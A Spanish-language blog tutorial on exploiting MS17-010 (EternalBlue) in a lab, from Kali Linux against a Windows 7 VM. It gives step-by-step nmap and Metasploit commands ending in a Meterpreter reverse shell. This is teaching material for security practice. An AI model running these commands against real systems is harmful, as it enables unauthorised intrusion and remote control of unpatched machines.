Informacional

Blog Técnico: Cómo Explorar la Vulnerabilidad SMBv1 en Windows 7 desde Kali Linux

· 62 vistas
Blog Técnico: Cómo Explorar la Vulnerabilidad SMBv1 en Windows 7 desde Kali Linux

Parte 1: Preparación del Laboratorio

Objetivo

Explotar la vulnerabilidad SMBv1 (MS17-010 / EternalBlue) en una máquina con Windows 7 desde una máquina atacante con Kali Linux. Este ejercicio es únicamente con fines educativos y de aprendizaje sobre ciberseguridad defensiva y ofensiva.

 

1. Instalación del Sistema Operativo

Máquina Víctima: Windows 7

  • Descarga: Puedes conseguir una imagen ISO oficial de evaluación desde archive.org o desde tu fuente habitual.
  • Requisitos mínimos:
    • 2 GB de RAM
    • 1 núcleo de CPU
    • 30 GB de disco duro
  • Virtualizador sugerido: VirtualBox o VMware.

Configuración básica de red:

  • Tipo de red: “Red Interna” o “Adaptador puente” para que ambas máquinas estén en la misma red local.
  • Dirección IP fija:
    • IP: 192.168.1.119
    • Máscara: 255.255.255.0
    • Gateway: 192.168.1.1 (puedes usar una ficticia si no hay salida a internet)
    • DNS: 8.8.8.8

Activar SMBv1

  1. En el Panel de Control → "Programas y características" → "Activar o desactivar las características de Windows".
  2. Marca “Soporte para compartir archivos SMB 1.0/CIFS”.
  3. Reinicia el sistema.

 

2. Kali Linux como atacante

Kali Linux

  • Asegúrate de tener Kali actualizado (sudo apt update && sudo apt upgrade)
  • Dirección IP: 192.168.1.130
  • Red: misma configuración que la víctima (puente o red interna)

Herramientas necesarias

  • nmap
  • msfconsole (Metasploit)
  • Exploit: windows/smb/ms17_010_eternalblue

 

3. Verificando la vulnerabilidad

Antes de explotar, validamos si la máquina es vulnerable:

nmap -p 445 --script smb-vuln-ms17-010 192.168.1.119
  •  Si el resultado indica “VULNERABLE”, estás listo para el siguiente paso.

 

Diferencia entre Exploit y Payload

  • Exploit: es el código que aprovecha una vulnerabilidad. En este caso, eternalblue explota SMBv1.
  • Payload: es el código que se ejecuta una vez se ha explotado la vulnerabilidad. Por ejemplo: abrir una shell inversa (reverse shell), crear un usuario, etc.

⚠️ Puedes tener éxito con el exploit, pero si el payload falla (por ejemplo, por firewall o configuración), no obtendrás acceso.

 

Parte 2: Explotación de SMBv1 (EternalBlue) con Metasploit

Requisitos previos (repaso rápido)

  • IP víctima (Windows 7): 192.168.1.119
  • IP atacante (Kali): 192.168.1.130
  • Puerto objetivo en la víctima: 445 (SMB)
  • Kali Linux actualizado y con msfconsole instalado

 

Paso 1: Abrir Metasploit

En Kali, abre una terminal y ejecuta:

msfconsole

Esto abrirá el entorno interactivo de Metasploit.

 

Paso 2: Buscar el exploit

Busca el módulo EternalBlue:

search ms17_010

Busca esta línea (o similar):

exploit/windows/smb/ms17_010_eternalblue

 

 

Paso 3: Cargar el módulo

Carga el exploit con:

use exploit/windows/smb/ms17_010_eternalblue

Verás el prompt cambiar a:

msf6 exploit(windows/smb/ms17_010_eternalblue) >

 

Paso 4: Configurar parámetros del ataque

Configura la dirección IP de la víctima:

set RHOSTS 192.168.1.119

Configura tu IP atacante como destino del payload:

set LHOST 192.168.1.130

Opcionalmente, configura el puerto de escucha:

set LPORT 4444

 

Paso 5: Elegir un payload

Ahora seleccionas qué quieres ejecutar cuando logres la explotación. Por defecto puedes usar un meterpreter reverse shell:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Si es un Windows 7 de 32 bits, usa:

set PAYLOAD windows/meterpreter/reverse_tcp

 

Paso 6: Verifica los parámetros

Para confirmar la configuración:

show options

Debe mostrar algo como:

RHOSTS    => 192.168.1.119
LHOST     => 192.168.1.130
LPORT     => 4444
PAYLOAD   => windows/x64/meterpreter/reverse_tcp

 

Paso 7: Ejecutar el exploit

Ejecuta el ataque con:

run

O con:

exploit

 

Resultado esperado

Si todo sale bien, deberías ver algo como:

[*] Started reverse TCP handler on 192.168.1.130:4444
[*] 192.168.1.119:445 - Connecting to target for exploitation.
[*] 192.168.1.119:445 - Target OS selected valid for OS indicated.
...
[*] Meterpreter session 1 opened

 

 

Etiquetas Relacionadas

#AnalisisForense #Ciberseguridad #EternalBlue #HackingEtico #KaliLinux #LaboratorioCiberseguridad #Metasploit #PostExplotacion #SMBv1 #WindowsServer